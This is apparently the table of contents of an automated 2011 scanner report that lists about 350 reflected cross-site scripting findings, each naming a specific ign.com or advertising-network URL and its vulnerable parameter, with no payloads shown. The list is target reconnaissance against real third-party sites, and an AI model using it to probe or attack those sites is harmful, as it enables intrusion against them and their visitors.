XSS, Cross Site Scripting, DORK, ign.com, CWE-79, CAPEC-86

XSS in ign.com HTTP Systems | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Feb 06 20:44:36 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

1.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

1.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

1.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

1.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

1.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

1.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

1.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

1.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

1.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

1.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

1.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

1.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

1.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

1.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

1.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

1.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

1.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

1.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

1.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

1.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

1.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

1.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

1.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

1.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

1.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

1.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

1.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

1.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

1.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

1.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

1.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

1.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

1.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

1.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

1.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

1.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

1.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

1.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

1.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

1.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

1.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

1.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

1.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

1.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

1.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

1.47. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.50. http://ads.adxpose.com/ads/ads.js [uid parameter]

1.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

1.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

1.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

1.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

1.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]

1.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]

1.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]

1.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]

1.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]

1.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]

1.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]

1.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]

1.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]

1.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]

1.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

1.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

1.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

1.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

1.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

1.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

1.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

1.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

1.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

1.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

1.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

1.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

1.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

1.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

1.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

1.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

1.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

1.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

1.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

1.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

1.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

1.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

1.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

1.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

1.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

1.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

1.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

1.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

1.106. http://club.ign.com/b/api/objects/user.js [callback parameter]

1.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

1.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

1.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

1.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

1.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

1.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

1.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

1.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

1.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

1.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

1.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

1.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

1.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

1.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

1.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

1.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

1.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

1.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

1.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

1.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

1.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

1.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

1.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

1.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

1.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

1.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

1.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

1.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

1.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

1.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

1.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.159. http://ds.ign.com/index/latest-updates.html [types parameter]

1.160. http://ds.ign.com/index/latest-updates.html [types parameter]

1.161. http://ds.ign.com/index/latest-updates.html [types parameter]

1.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

1.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

1.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

1.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

1.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.180. http://event.adxpose.com/event.flow [uid parameter]

1.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

1.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

1.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

1.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

1.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

1.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

1.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

1.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

1.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

1.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

1.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

1.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

1.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

1.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

1.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

1.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

1.197. http://fimserve.ign.com/ [__ipculture parameter]

1.198. http://fimserve.ign.com/ [__preferredculture parameter]

1.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]

1.200. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 1]

1.201. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 2]

1.202. http://fonts.ignimgs.com/wns6kpl.js [REST URL parameter 1]

1.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

1.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

1.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

1.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

1.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

1.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

1.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

1.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

1.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

1.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

1.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

1.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

1.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

1.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

1.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

1.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

1.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

1.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

1.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

1.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

1.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

1.231. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

1.232. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

1.233. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

1.234. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

1.235. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

1.236. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

1.237. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

1.238. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

1.239. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

1.240. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

1.241. http://ib.adnxs.com/ab [cnd parameter]

1.242. http://ib.adnxs.com/ab [referrer parameter]

1.243. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

1.244. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

1.245. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

1.246. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

1.247. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

1.248. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

1.249. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

1.250. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

1.251. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

1.252. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

1.253. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

1.254. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

1.255. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

1.256. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

1.257. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

1.258. http://js.revsci.net/gateway/gw.js [csid parameter]

1.259. http://landlanss.gfi.com/freeware-network-security-scanner-sm/ [REST URL parameter 1]

1.260. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

1.261. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

1.262. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

1.263. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

1.264. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

1.265. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

1.266. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

1.267. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

1.268. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

1.269. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

1.270. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

1.271. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

1.272. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

1.273. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

1.274. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

1.275. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

1.276. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

1.277. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

1.278. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

1.279. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

1.280. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

1.281. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

1.282. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]

1.283. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]

1.284. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]

1.285. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]

1.286. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]

1.287. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]

1.288. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]

1.289. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]

1.290. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]

1.291. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]

1.292. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]

1.293. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]

1.294. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]

1.295. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]

1.296. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]

1.297. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]

1.298. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.299. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.300. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]

1.301. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]

1.302. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.303. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.304. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.305. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.306. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.307. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.308. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.309. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.310. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.311. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.312. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]

1.313. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]

1.314. http://music.ign.com/ [name of an arbitrarily supplied request parameter]

1.315. http://music.ign.com/ [name of an arbitrarily supplied request parameter]

1.316. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]

1.317. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]

1.318. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]

1.319. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]

1.320. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]

1.321. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]

1.322. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]

1.323. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]

1.324. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]

1.325. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]

1.326. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]

1.327. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]

1.328. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]

1.329. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]

1.330. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]

1.331. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]

1.332. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]

1.333. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]

1.334. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.335. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.336. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.337. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.338. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.339. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.340. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.341. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.342. http://pc.ign.com/index/latest-updates.html [types parameter]

1.343. http://pc.ign.com/index/latest-updates.html [types parameter]

1.344. http://pc.ign.com/index/latest-updates.html [types parameter]

1.345. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.346. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.347. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.348. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.349. http://pc.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

